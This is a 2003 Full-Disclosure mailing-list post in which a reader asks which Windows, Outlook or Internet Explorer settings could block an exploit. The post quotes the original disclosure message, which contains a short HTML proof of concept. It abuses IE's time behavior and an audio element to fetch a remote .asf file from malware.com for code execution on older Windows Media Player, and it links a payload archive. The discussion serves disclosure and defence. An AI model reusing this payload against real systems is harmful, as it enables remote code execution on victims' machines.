Do you have any suggestions of feature(s) that can be turned off in Windows, Outlook, or Internet Explorer that will prevent this exploit for working? I'm mostly interested in some feature that wouldn't typically be used on a Web page. It's also not necessary for there to be a UI to turn a feature on or off. A hidden registry setting is fine.
Also, Internet Explorer has an option for turning off sounds in Web pages. If sounds are turned off in IE, will this exploit still work? Thanks, Richard -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Friday, September 12, 2003 11:56 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code <!-- when viewing mail in recent versions of outlook it operates in the restricted zone ,eg no active scripting allowed to run, so these wont be exploitable unless someone proofs otherwise that is ;) --> <html xmlns:t> <head><style> t\:*{behavior:url(#default#time);display:none}</style></head><body> <t:audio t:src="http://www.malware.com/freek.asf"; /> </body></html> Trivial inline url flip in the restricted zone. WMP 8 and under. Unpatched since May 2003 should do the trick: http://www.malware.com/but.its.free.zip -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ################################################################# ################################################################# ################################################################# ##### ##### ##### ################################################################# ################################################################# ################################################################# _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
